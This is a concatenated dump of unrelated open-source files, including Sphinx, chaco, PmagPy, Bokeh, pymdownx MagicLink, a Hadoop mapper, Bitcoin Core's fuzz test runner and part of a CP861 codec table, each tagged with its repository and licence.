#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Pontoon', u'Pontoon Documentation',
author, 'Pontoon', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| jotes/pontoon | docs/conf.py | Python | bsd-3-clause | 9,297 |
from better_zoom import BetterZoom
from better_selecting_zoom import BetterSelectingZoom
from broadcaster import BroadcasterTool
from dataprinter import DataPrinter
from data_label_tool import DataLabelTool
from enable.tools.drag_tool import DragTool
from draw_points_tool import DrawPointsTool
from drag_zoom import DragZoom
from highlight_tool import HighlightTool
from image_inspector_tool import ImageInspectorTool, ImageInspectorOverlay
from lasso_selection import LassoSelection
from legend_tool import LegendTool
from legend_highlighter import LegendHighlighter
from line_inspector import LineInspector
from line_segment_tool import LineSegmentTool
from move_tool import MoveTool
from pan_tool import PanTool
from point_marker import PointMarker
from range_selection import RangeSelection
from range_selection_2d import RangeSelection2D
from range_selection_overlay import RangeSelectionOverlay
from regression_lasso import RegressionLasso, RegressionOverlay
from save_tool import SaveTool
from scatter_inspector import ScatterInspector
from select_tool import SelectTool
from simple_inspector import SimpleInspectorTool
from tool_states import ZoomState, PanState, GroupedToolState, SelectedZoomState
from tracking_pan_tool import TrackingPanTool
from tracking_zoom import TrackingZoom
from traits_tool import TraitsTool
from zoom_tool import ZoomTool
# EOF
| tommy-u/chaco | chaco/tools/api.py | Python | bsd-3-clause | 1,366 |
#!/usr/bin/env python
from __future__ import print_function
from __future__ import absolute_import
import os
from . import spd
# K temps: [0.0, 100.0, 150.0, 200.0, 225.0, 250.0, 275.0, 300.0, 325.0, 350.0, 375.0, 400.0, 425.0, 450.0, 475.0, 500.0, 525.0, 550.0]
# C temps: [273, 373.0, 423.0, 473.0, 498.0, 523.0, 548.0, 573.0, 598.0, 623.0, 648.0, 673.0, 698.0, 723.0, 748.0, 773.0, 798.0, 823.0]
from . import new_lj_thellier_gui_spd as tgs
cwd = os.getcwd()
main_dir = cwd + '/SPD'
calculate = ['int_n', 'frac', 'fvds', 'b_sigma', 'b_beta', 'scat', 'g', 'k', 'k_sse', 'z', 'int_mad_anc', 'int_dang', 'int_alpha', 'alpha_prime', 'theta', 'gamma', 'int_ptrm_n', 'ptrm', 'drat', 'mdrat', 'maxdev', 'dpal', 'md', 'tail_drat', 'dtr', 'dac', 'DANG']
#calculate = ['int_n', 'frac', 'f', 'fvds', 'b_sigma', 'b_beta', 'scat', 'g', 'k', 'k_sse', 'z', 'z_md', 'q', 'r_sq', 'coeff_det_sq', 'int_mad', 'int_mad_anc', 'int_dang', 'int_alpha', 'alpha_prime', 'theta', 'int_crm', 'gamma', 'int_ptrm_n', 'ptrm', 'drat', 'drats', 'cdrat', 'mdrat', 'dck', 'maxdev', 'mdev', 'dpal', 'int_ptrm_tail_n', 'md', 'tail_drat', 'dtr', 'dt', 'ac_n', 'dac', 'gmax']
#calculate = ['int_n', 'int_alpha', 'f', 'k', 'drats', 'int_ptrm_tail_n']
#calculate = ['drats']
gui = tgs.Arai_GUI('/magic_measurements.txt', main_dir)
specimens = list(gui.Data.keys())
example = spd.PintPars(gui.Data, '0238x6011044', 473., 623., 'magic', calculate)
example.calculate_all_statistics()
PintPars_example = example
def make_specimens(calculate=calculate):
for stat in calculate:
spec = spd.PintPars(gui.Data, '0238x6011044', 473., 623., 'magic', [stat])
spec.reqd_stats()
print('---------')
print(calculate)
def many_specimens(calculate=calculate):
from itertools import combinations
c = combinations(calculate, 2)
for combo in c:
print('combo', combo)
spec = spd.PintPars(gui.Data, '0238x6011044', 473., 623., 'magic', combo)
spec.reqd_stats()
print('XXXXXXXXXXXXXXX')
#spec.calculate_all_statistics()
SCAT_spec = spd.PintPars(gui.Data, '0238x6011044', 273., 673.) # 0, 400
SCAT_spec2 = spd.PintPars(gui.Data, '0238x6011044', 273., 698.) # 0, 425
SCAT_spec.York_Regression()
SCAT_spec2.York_Regression()
#new_spec = spd.PintPars(gui.Data, '0238x5721062', 100. + 273., 525. + 273.)
#new_spec.calculate_all_statistics()
#gui2 = tgs.Arai_GUI('/consistency_tests/Yamamoto_Hushi_2008_magic_measurements.txt', cwd)
#thing2 = spd.PintPars(gui2.Data, 'SW01-01A-2', 100. + 273., 480. + 273.)
#thing2 = PintPars(gui.Data, specimens[0], 473., 623.)
#thing2.calculate_all_statistics()
#thing3 = PintPars(gui.Data, specimens[1], 473., 623.)
#thing3.calculate_all_statistics()
#thing4 = PintPars(gui.Data, specimens[2], 473., 623.)
#thing4.calculate_all_statistics()
#thing5 = PintPars(gui.Data, specimens[3], 473., 623.)
#thing5.calculate_all_statistics()
#thing6 = PintPars(gui.Data, specimens[4], 473., 623.)
#thing6.calculate_all_statistics()
#gui2 = tgs.Arai_GUI('new_magic_measurements.txt')
#gui3 = tgs.Arai_GUI('consistency_tests/Bowles_etal_2006_magic_measurements.txt')
#gui4 = tgs.Arai_GUI('consistency_tests/Donadini_etal_2007_magic_measurements.txt')
#gui5 = tgs.Arai_GUI('consistency_tests/Krasa_2000_magic_measurements.txt')
#gui6 = tgs.Arai_GUI('consistency_tests/Muxworthy_etal_2011_magic_measurements.txt')
#gui7 = tgs.Arai_GUI('consistency_tests/Paterson_etal_2010_magic_measurements.txt')
#gui8 = tgs.Arai_GUI('consistency_tests/Selkin_etal_2000_magic_measurements.txt')
#gui10 = tgs.Arai_GUI('consistency_tests/Yamamoto_etal_2003_magic_measurements.txt')
| Caoimhinmg/PmagPy | SPD/test_instance.py | Python | bsd-3-clause | 3,635 |
from __future__ import print_function
import flask
import os
import threading
import time
import webbrowser
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_basedir = os.path.join("..", os.path.dirname(__file__))
app = flask.Flask(__name__, static_path="/unused")
PORT=5009
http_server = HTTPServer(WSGIContainer(app))
"""this is a simple server to facilitate developing the docs. by
serving up static files from this server, we avoid the need to use a
symlink.
"""
@app.route('/')
def welcome():
return """
<h1>Welcome to the Bokeh documentation server</h1>
You probably want to go to <a href="/en/latest/index.html"> Index</a>
"""
@app.route('/en/latest/<path:filename>')
def send_pic(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/"), filename)
def open_browser():
# Child process
time.sleep(0.5)
webbrowser.open("http://localhost:%d/en/latest/index.html" % PORT, new="tab")
def serve_http():
http_server.listen(PORT)
IOLoop.instance().start()
def shutdown_server():
ioloop = IOLoop.instance()
ioloop.add_callback(ioloop.stop)
print("Asked Server to shut down.")
def ui():
time.sleep(0.5)
input("Press <ENTER> to exit...\n")
if __name__ == "__main__":
print("\nStarting Bokeh plot server on port %d..." % PORT)
print("Visit http://localhost:%d/en/latest/index.html to see plots\n" % PORT)
t_server = threading.Thread(target=serve_http)
t_server.start()
t_browser = threading.Thread(target=open_browser)
t_browser.start()
ui()
shutdown_server()
t_server.join()
t_browser.join()
print("Server shut down.")
| phobson/bokeh | sphinx/docserver.py | Python | bsd-3-clause | 1,749 |
"""
Magic Link.
pymdownx.magiclink
An extension for Python Markdown.
Find http|ftp links and email address and turn them to actual links
MIT license.
Copyright (c) 2014 - 2017 Isaac Muse <isaacmuse@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import unicode_literals
from markdown import Extension
from markdown.inlinepatterns import LinkPattern, Pattern
from markdown.treeprocessors import Treeprocessor
from markdown import util as md_util
import re
RE_MAIL = r'''(?xi)
(
(?<![-/\+@a-z\d_])(?:[-+a-z\d_]([-a-z\d_+]|\.(?!\.))*) # Local part
(?<!\.)@(?:[-a-z\d_]+\.) # @domain part start
(?:(?:[-a-z\d_]|(?<!\.)\.(?!\.))*)[a-z]\b # @domain.end (allow multiple dot names)
(?![-@]) # Don't allow last char to be followed by these
)
'''
RE_LINK = r'''(?xi)
(
(?:(?<=\b)|(?<=_))(?:
(?:ht|f)tps?://(?:(?:[^_\W][-\w]*(?:\.[-\w.]+)+)|localhost)| # (http|ftp)://
(?P<www>w{3}\.)[^_\W][-\w]*(?:\.[-\w.]+)+ # www.
)
/?[-\w.?,!'(){}\[\]/+&@%$#=:"|~;]* # url path, fragments, and query stuff
(?:[^_\W]|[-/#@$+=]) # allowed end chars
)
'''
RE_AUTOLINK = r'(?i)<((?:ht|f)tps?://[^>]*)>'
RE_REPO_LINK = re.compile(
r'''(?xi)
(?:
(?P<github>(?P<github_base>https://(?:w{3}\.)?github.com/(?P<github_user_repo>[^/]+/[^/]+))/
(?:issues/(?P<github_issue>\d+)/?|
pull/(?P<github_pull>\d+)/?|
commit/(?P<github_commit>[\da-f]+)/?)) |
(?P<bitbucket>(?P<bitbucket_base>https://(?:w{3}\.)?bitbucket.org/(?P<bitbucket_user_repo>[^/]+/[^/]+))/
(?:issues/(?P<bitbucket_issue>\d+)(?:/[^/]+)?/?|
pull-requests/(?P<bitbucket_pull>\d+)(?:/[^/]+(?:/diff)?)?/?|
commits/commit/(?P<bitbucket_commit>[\da-f]+)/?)) |
(?P<gitlab>(?P<gitlab_base>https://(?:w{3}\.)?gitlab.com/(?P<gitlab_user_repo>[^/]+/[^/]+))/
(?:issues/(?P<gitlab_issue>\d+)/?|
merge_requests/(?P<gitlab_pull>\d+)/?|
commit/(?P<gitlab_commit>[\da-f]+)/?))
)
'''
)
class MagicShortenerTreeprocessor(Treeprocessor):
"""Treeprocessor that finds repo issue and commit links and shortens them."""
# Repo link types
ISSUE = 0
PULL = 1
COMMIT = 2
def shorten(self, link, my_repo, link_type, user_repo, value, url, hash_size):
"""Shorten url."""
if link_type is self.COMMIT:
# user/repo@`hash`
text = '' if my_repo else user_repo + '@'
link.text = md_util.AtomicString(text)
# Need a root with an element for things to get processed.
# Send the `value` through and retreive it from the p element.
# Pop it off and add it to the link.
el = md_util.etree.Element('div')
p = md_util.etree.SubElement(el, 'p')
p.text = '`%s`' % value[0:hash_size]
el = self.markdown.treeprocessors['inline'].run(el)
p = list(el)[0]
for child in list(p):
link.append(child)
p.remove(child)
else:
# user/repo#(issue|pull)
link.text = ('#' + value) if my_repo else (user_repo + '#' + value)
def get_provider(self, match):
"""Get the provider and hash size."""
# Set provider specific variables
if match.group('github'):
provider = 'github'
hash_size = 7
elif match.group('bitbucket'):
provider = 'bitbucket'
hash_size = 7
elif match.group('gitlab'):
provider = 'gitlab'
hash_size = 8
return provider, hash_size
def get_type(self, provider, match):
"""Get the link type."""
# Gather info about link type
if match.group(provider + '_commit') is not None:
value = match.group(provider + '_commit')
link_type = self.COMMIT
elif match.group(provider + '_pull') is not None:
value = match.group(provider + '_pull')
link_type = self.PULL
else:
value = match.group(provider + '_issue')
link_type = self.ISSUE
return value, link_type
def is_my_repo(self, provider, match):
"""Check if link is from our specified repo."""
# See if these links are from the specified repo.
my_repo = match.group(provider + '_base') == self.base
if not my_repo and self.hide_protocol:
my_repo = match.group(provider + '_base') == ('https://' + self.base)
return my_repo
def run(self, root):
"""Shorten popular git repository links."""
self.base = self.config.get('base_repo_url', '').rstrip('/')
self.hide_protocol = self.config['hide_protocol']
links = root.iter('a')
for link in links:
has_child = len(list(link))
is_magic = link.attrib.get('magiclink')
href = link.attrib.get('href', '')
text = link.text
if is_magic:
del link.attrib['magiclink']
# We want a normal link. No subelements embedded in it, just a normal string.
if has_child or not text: # pragma: no cover
continue
# Make sure the text matches the href. If needed, add back protocol to be sure.
# Not all links will pass through MagicLink, so we try both with and without protocol.
if text == href or (is_magic and self.hide_protocol and ('https://' + text) == href):
m = RE_REPO_LINK.match(href)
if m:
provider, hash_size = self.get_provider(m)
my_repo = self.is_my_repo(provider, m)
value, link_type = self.get_type(provider, m)
# All right, everything set, let's shorten.
self.shorten(
link,
my_repo,
link_type,
m.group(provider + '_user_repo'),
value,
href,
hash_size
)
return root
class MagiclinkPattern(LinkPattern):
"""Convert html, ftp links to clickable links."""
def handleMatch(self, m):
"""Handle URL matches."""
shorten = self.config.get('repo_url_shortener', False)
el = md_util.etree.Element("a")
el.text = md_util.AtomicString(m.group(2))
if m.group("www"):
href = "http://%s" % m.group(2)
else:
href = m.group(2)
if self.config['hide_protocol']:
el.text = md_util.AtomicString(el.text[el.text.find("://") + 3:])
if shorten:
el.set('magiclink', '1')
el.set("href", self.sanitize_url(self.unescape(href.strip())))
return el
class MagiclinkAutoPattern(Pattern):
"""Return a link Element given an autolink `<http://example/com>`."""
def handleMatch(self, m):
"""Return link optionally without protocol."""
shorten = self.config.get('repo_url_shortener', False)
el = md_util.etree.Element("a")
el.set('href', self.unescape(m.group(2)))
el.text = md_util.AtomicString(m.group(2))
if self.config['hide_protocol']:
el.text = md_util.AtomicString(el.text[el.text.find("://") + 3:])
if shorten:
el.attrib['magiclink'] = '1'
return el
class MagicMailPattern(LinkPattern):
"""Convert emails to clickable email links."""
def email_encode(self, code):
"""Return entity definition by code, or the code if not defined."""
return "%s#%d;" % (md_util.AMP_SUBSTITUTE, code)
def handleMatch(self, m):
"""Handle email link patterns."""
el = md_util.etree.Element("a")
email = self.unescape(m.group(2))
href = "mailto:%s" % email
el.text = md_util.AtomicString(''.join([self.email_encode(ord(c)) for c in email]))
el.set("href", ''.join([md_util.AMP_SUBSTITUTE + '#%d;' % ord(c) for c in href]))
return el
class MagiclinkExtension(Extension):
"""Add Easylink extension to Markdown class."""
def __init__(self, *args, **kwargs):
"""Initialize."""
self.config = {
'hide_protocol': [
False,
"If 'True', links are displayed without the initial ftp://, http:// or https://"
"- Default: False"
],
'repo_url_shortener': [
False,
"If 'True' repo commit and issue links are shortened - Default: False"
],
'base_repo_url': [
'',
'The base repo url to use - Default: ""'
]
}
super(MagiclinkExtension, self).__init__(*args, **kwargs)
def extendMarkdown(self, md, md_globals):
"""Add support for turning html links and emails to link tags."""
config = self.getConfigs()
auto_link_pattern = MagiclinkAutoPattern(RE_AUTOLINK, md)
auto_link_pattern.config = config
link_pattern = MagiclinkPattern(RE_LINK, md)
link_pattern.config = config
md.inlinePatterns['autolink'] = auto_link_pattern
md.inlinePatterns.add("magic-link", link_pattern, "<entity")
md.inlinePatterns.add("magic-mail", MagicMailPattern(RE_MAIL, md), "<entity")
if config.get('repo_url_shortener', False):
shortener = MagicShortenerTreeprocessor(md)
shortener.config = config
md.treeprocessors.add("magic-repo-shortener", shortener, "<prettify")
def makeExtension(*args, **kwargs):
"""Return extension."""
return MagiclinkExtension(*args, **kwargs)
| brunobergher/dotfiles | sublime/pymdownx/st3/pymdownx/magiclink.py | Python | mit | 10,950 |
import sys
for line in sys.stdin:
data = line.strip().split(" ")
if len(data) == 10:
page = data[6]
ip_address = data[0]
print "{0}\t{1}".format(page, ip_address) | mi1980/projecthadoop3 | udacity/ud617-intro-hadoop/code/lesson3/server-project/mapper1.py | Python | mit | 170 |
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run fuzz test targets.
"""
from concurrent.futures import ThreadPoolExecutor, as_completed
import argparse
import configparser
import logging
import os
import subprocess
import sys
def get_fuzz_env(*, target, source_dir):
return {
'FUZZ': target,
'UBSAN_OPTIONS':
f'suppressions={source_dir}/test/sanitizer_suppressions/ubsan:print_stacktrace=1:halt_on_error=1:report_error_type=1',
'ASAN_OPTIONS': # symbolizer disabled due to https://github.com/google/sanitizers/issues/1364#issuecomment-761072085
'symbolize=0:detect_stack_use_after_return=1:check_initialization_order=1:strict_init_order=1',
}
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='''Run the fuzz targets with all inputs from the seed_dir once.''',
)
parser.add_argument(
"-l",
"--loglevel",
dest="loglevel",
default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console.",
)
parser.add_argument(
'--valgrind',
action='store_true',
help='If true, run fuzzing binaries under the valgrind memory error detector',
)
parser.add_argument(
'-x',
'--exclude',
help="A comma-separated list of targets to exclude",
)
parser.add_argument(
'--par',
'-j',
type=int,
default=4,
help='How many targets to merge or execute in parallel.',
)
parser.add_argument(
'seed_dir',
help='The seed corpus to run on (must contain subfolders for each fuzz target).',
)
parser.add_argument(
'target',
nargs='*',
help='The target(s) to run. Default is to run all targets.',
)
parser.add_argument(
'--m_dir',
help='Merge inputs from this directory into the seed_dir.',
)
parser.add_argument(
'-g',
'--generate',
action='store_true',
help='Create new corpus seeds (or extend the existing ones) by running'
' the given targets for a finite number of times. Outputs them to'
' the passed seed_dir.'
)
args = parser.parse_args()
# Set up logging
logging.basicConfig(
format='%(message)s',
level=int(args.loglevel) if args.loglevel.isdigit() else args.loglevel.upper(),
)
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
config.read_file(open(configfile, encoding="utf8"))
if not config["components"].getboolean("ENABLE_FUZZ"):
logging.error("Must have fuzz targets built")
sys.exit(1)
# Build list of tests
test_list_all = parse_test_list(fuzz_bin=os.path.join(config["environment"]["BUILDDIR"], 'src', 'test', 'fuzz', 'fuzz'))
if not test_list_all:
logging.error("No fuzz targets found")
sys.exit(1)
logging.debug("{} fuzz target(s) found: {}".format(len(test_list_all), " ".join(sorted(test_list_all))))
args.target = args.target or test_list_all # By default run all
test_list_error = list(set(args.target).difference(set(test_list_all)))
if test_list_error:
logging.error("Unknown fuzz targets selected: {}".format(test_list_error))
test_list_selection = list(set(test_list_all).intersection(set(args.target)))
if not test_list_selection:
logging.error("No fuzz targets selected")
if args.exclude:
for excluded_target in args.exclude.split(","):
if excluded_target not in test_list_selection:
logging.error("Target \"{}\" not found in current target list.".format(excluded_target))
continue
test_list_selection.remove(excluded_target)
test_list_selection.sort()
logging.info("{} of {} detected fuzz target(s) selected: {}".format(len(test_list_selection), len(test_list_all), " ".join(test_list_selection)))
if not args.generate:
test_list_seedless = []
for t in test_list_selection:
corpus_path = os.path.join(args.seed_dir, t)
if not os.path.exists(corpus_path) or len(os.listdir(corpus_path)) == 0:
test_list_seedless.append(t)
test_list_seedless.sort()
if test_list_seedless:
logging.info(
"Fuzzing harnesses lacking a seed corpus: {}".format(
" ".join(test_list_seedless)
)
)
logging.info("Please consider adding a fuzz seed corpus at https://github.com/bitcoin-core/qa-assets")
try:
help_output = subprocess.run(
args=[
os.path.join(config["environment"]["BUILDDIR"], 'src', 'test', 'fuzz', 'fuzz'),
'-help=1',
],
env=get_fuzz_env(target=test_list_selection[0], source_dir=config['environment']['SRCDIR']),
timeout=20,
check=True,
stderr=subprocess.PIPE,
universal_newlines=True,
).stderr
if "libFuzzer" not in help_output:
logging.error("Must be built with libFuzzer")
sys.exit(1)
except subprocess.TimeoutExpired:
logging.error("subprocess timed out: Currently only libFuzzer is supported")
sys.exit(1)
with ThreadPoolExecutor(max_workers=args.par) as fuzz_pool:
if args.generate:
return generate_corpus_seeds(
fuzz_pool=fuzz_pool,
src_dir=config['environment']['SRCDIR'],
build_dir=config["environment"]["BUILDDIR"],
seed_dir=args.seed_dir,
targets=test_list_selection,
)
if args.m_dir:
merge_inputs(
fuzz_pool=fuzz_pool,
corpus=args.seed_dir,
test_list=test_list_selection,
src_dir=config['environment']['SRCDIR'],
build_dir=config["environment"]["BUILDDIR"],
merge_dir=args.m_dir,
)
return
run_once(
fuzz_pool=fuzz_pool,
corpus=args.seed_dir,
test_list=test_list_selection,
src_dir=config['environment']['SRCDIR'],
build_dir=config["environment"]["BUILDDIR"],
use_valgrind=args.valgrind,
)
def generate_corpus_seeds(*, fuzz_pool, src_dir, build_dir, seed_dir, targets):
"""Generates new corpus seeds.
Run {targets} without input, and outputs the generated corpus seeds to
{seed_dir}.
"""
logging.info("Generating corpus seeds to {}".format(seed_dir))
def job(command, t):
logging.debug("Running '{}'\n".format(" ".join(command)))
logging.debug("Command '{}' output:\n'{}'\n".format(
' '.join(command),
subprocess.run(
command,
env=get_fuzz_env(target=t, source_dir=src_dir),
check=True,
stderr=subprocess.PIPE,
universal_newlines=True,
).stderr))
futures = []
for target in targets:
target_seed_dir = os.path.join(seed_dir, target)
os.makedirs(target_seed_dir, exist_ok=True)
command = [
os.path.join(build_dir, 'src', 'test', 'fuzz', 'fuzz'),
"-runs=100000",
target_seed_dir,
]
futures.append(fuzz_pool.submit(job, command, target))
for future in as_completed(futures):
future.result()
def merge_inputs(*, fuzz_pool, corpus, test_list, src_dir, build_dir, merge_dir):
logging.info("Merge the inputs from the passed dir into the seed_dir. Passed dir {}".format(merge_dir))
jobs = []
for t in test_list:
args = [
os.path.join(build_dir, 'src', 'test', 'fuzz', 'fuzz'),
'-merge=1',
'-shuffle=0',
'-prefer_small=1',
'-use_value_profile=1', # Also done by oss-fuzz https://github.com/google/oss-fuzz/issues/1406#issuecomment-387790487
os.path.join(corpus, t),
os.path.join(merge_dir, t),
]
os.makedirs(os.path.join(corpus, t), exist_ok=True)
os.makedirs(os.path.join(merge_dir, t), exist_ok=True)
def job(t, args):
output = 'Run {} with args {}\n'.format(t, " ".join(args))
output += subprocess.run(
args,
env=get_fuzz_env(target=t, source_dir=src_dir),
check=True,
stderr=subprocess.PIPE,
universal_newlines=True,
).stderr
logging.debug(output)
jobs.append(fuzz_pool.submit(job, t, args))
for future in as_completed(jobs):
future.result()
def run_once(*, fuzz_pool, corpus, test_list, src_dir, build_dir, use_valgrind):
jobs = []
for t in test_list:
corpus_path = os.path.join(corpus, t)
os.makedirs(corpus_path, exist_ok=True)
args = [
os.path.join(build_dir, 'src', 'test', 'fuzz', 'fuzz'),
'-runs=1',
corpus_path,
]
if use_valgrind:
args = ['valgrind', '--quiet', '--error-exitcode=1'] + args
def job(t, args):
output = 'Run {} with args {}'.format(t, args)
result = subprocess.run(
args,
env=get_fuzz_env(target=t, source_dir=src_dir),
stderr=subprocess.PIPE,
universal_newlines=True,
)
output += result.stderr
return output, result
jobs.append(fuzz_pool.submit(job, t, args))
for future in as_completed(jobs):
output, result = future.result()
logging.debug(output)
try:
result.check_returncode()
except subprocess.CalledProcessError as e:
if e.stdout:
logging.info(e.stdout)
if e.stderr:
logging.info(e.stderr)
logging.info("Target \"{}\" failed with exit code {}".format(" ".join(result.args), e.returncode))
sys.exit(1)
def parse_test_list(*, fuzz_bin):
test_list_all = subprocess.run(
fuzz_bin,
env={
'PRINT_ALL_FUZZ_TARGETS_AND_ABORT': ''
},
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True,
).stdout.splitlines()
return test_list_all
if __name__ == '__main__':
main()
| Sjors/bitcoin | test/fuzz/test_runner.py | Python | mit | 10,859 |
""" Python Character Mapping Codec generated from 'CP861.TXT' with gencodec.py.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_map)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return (Codec().encode,Codec().decode,StreamReader,StreamWriter)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00e5, # LATIN SMALL LETTER A WITH RING ABOVE
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00eb, # LATIN SMALL LETTER E WITH DIAERESIS
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00d0, # LATIN CAPITAL LETTER ETH
0x008c: 0x00f0, # LATIN SMALL LETTER ETH
0x008d: 0x00de, # LATIN CAPITAL LETTER THORN
0x008e: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x008f: 0x00c5, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00e6, # LATIN SMALL LIGATURE AE
0x0092: 0x00c6, # LATIN CAPITAL LIGATURE AE
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x0095: 0x00fe, # LATIN SMALL LETTER THORN
0x0096: 0x00fb, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x0097: 0x00dd, # LATIN CAPITAL LETTER Y WITH ACUTE
0x0098: 0x00fd, # LATIN SMALL LETTER Y WITH ACUTE
0x0099: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00f8, # LATIN SMALL LETTER O WITH STROKE
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d8, # LATIN CAPITAL LETTER O WITH STROKE
0x009e: 0x20a7, # PESETA SIGN
0x009f: 0x0192, # LATIN SMALL LETTER F WITH HOOK
0x00a0: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x00a1: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00c1, # LATIN CAPITAL LETTER A WITH ACUTE
0x00a5: 0x00cd, # LATIN CAPITAL LETTER I WITH ACUTE
0x00a6: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00a7: 0x00da, # LATIN CAPITAL LETTER U WITH ACUTE
0x00a8: 0x00bf, # INVERTED QUESTION MARK
0x00a9: 0x2310, # REVERSED NOT SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00a1, # INVERTED EXCLAMATION MARK
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
